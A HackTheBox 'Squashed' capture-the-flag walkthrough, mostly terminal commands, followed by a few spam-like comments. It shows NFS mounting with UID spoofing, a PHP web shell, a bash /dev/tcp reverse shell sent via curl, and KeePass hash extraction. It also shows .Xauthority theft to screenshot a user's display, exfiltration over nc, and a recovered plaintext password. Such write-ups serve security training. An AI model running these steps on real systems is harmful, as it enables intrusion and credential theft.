HackTheBox – Squashed Walkthrough – In English
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nmap -A 10.10.11.191
┌──(root㉿kali)-[/home/kali/Downloads]
└─# showmount -e 10.10.11.191
┌──(root㉿kali)-[/home/kali/Downloads]
└─# mkdir /tmp/www /tmp/home_test
┌──(root㉿kali)-[/home/kali/Downloads]
└─# sudo mount -t nfs 10.10.11.191:/home/ross /tmp/home_test
┌──(root㉿kali)-[/home/kali/Downloads]
└─# sudo mount -t nfs 10.10.11.191:/var/www/html /tmp/www
Once we mount them we can see some interesting files, in /home/ross we can see a Passwords.kdbx file which is a keepass database, also a .Xauthority that manage the GUI, among other stuff, we also can’t access in /var/www/html, that’s because we don’t own or belong to the group, but we can add another user to access.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cd /tmp
┌──(root㉿kali)-[/tmp]
└─# ls -l
┌──(root㉿kali)-[/tmp]
└─# tree -fas ./home_test
┌──(root㉿kali)-[/tmp]
└─# tree -fas ./www
┌──(root㉿kali)-[/tmp]
└─# cd ./www
Once we add it, we can get in
┌──(root㉿kali)-[/tmp]
└─# sudo useradd sam
┌──(root㉿kali)-[/tmp]
└─# sudo usermod -u 2017 sam
┌──(root㉿kali)-[/tmp]
└─# sudo groupmod -g 2017 sam
┌──(root㉿kali)-[/tmp]
└─# id sam
Since we can write on it, let’s send us a reverse shell
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nc -nlvp 443
┌──(root㉿kali)-[/tmp]
└─# su sam
$ bash
sam@kali:/tmp$ ls –l
sam@kali:/$ echo ‘<?php system($_REQUEST[“cmd”]); ?>’ > /tmp/www/shell.php
sam@kali:/$ curl “http://10.10.11.191/shell.php?cmd=bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/10.10.14.6/443%200%3E%261%22”
┌──(root㉿kali)-[/tmp/home_test]
└─# tree
┌──(root㉿kali)-[/tmp/home_test]
└─# cd Documents
┌──(root㉿kali)-[/tmp/home_test/Documents]
└─# ls –lrt
┌──(root㉿kali)-[/tmp/home_test/Documents]
└─# cp Passwords.kdbx /home/kali/Downloads
┌──(root㉿kali)-[/tmp/home_test/Documents]
└─# cd /home/kali/Downloads
┌──(root㉿kali)-[/home/kali/Downloads]
└─# keepass2john Passwords.kdbx
However, we saw the .Xauthority file, and as we can see, ross has an active X session that we can
alex@squashed:/home/alex$ w
Well, in order to exploit the .Xauthority, we have to create a user with the specified id which is 1001.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# sudo useradd test2
┌──(root㉿kali)-[/home/kali/Downloads]
└─# sudo usermod -u 1001 test2
┌──(root㉿kali)-[/home/kali/Downloads]
└─# su test2
test2@kali:/home/kali/Downloads$ cd /tmp/home_test/
test2@kali:/tmp/home_test$ ls -l ./.Xauthority
Let’s mount a python server and transfer the file from the mount to the machine, so we will have the same .Xauthority as ross.
test2@kali:/tmp/home_test$ python3 -m http.server 8080
alex@squashed:/home/alex$ wget http://10.10.14.6:8080/.Xauthority
Let’s check the connection, and as we can see, Ross has the keepass open, and we could try to take a screen shot of his screen, with some luck we can get something juicy
alex@squashed:/home/alex$ env
alex@squashed:/home/alex$ export HOME=/home/alex
alex@squashed:~$ env
alex@squashed:~$ xdpyinfo -display :0
alex@squashed:~$ xwininfo -root -tree -display :0
Let’s take the screenshot, and transfer it to our machine
alex@squashed:~$ xwd -root -screen -silent -display :0 > screenshot.xwd
alex@squashed:~$ file ./screenshot.xwd
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nc -nlvp 9001 > scrreenshot.xwd
alex@squashed:~$ nc 10.10.14.6 9001 < screenshot.xwd
┌──(root㉿kali)-[/home/kali/Downloads]
└─# convert scrreenshot.xwd screen.png
Password: cah$mei7rai9A
@SAKSHAM DIXIT
Great article.
I think the admin of this web site is really working hard
for his web site, as here every data is quality based material.
Some truly superb information, Gladiola I noticed this.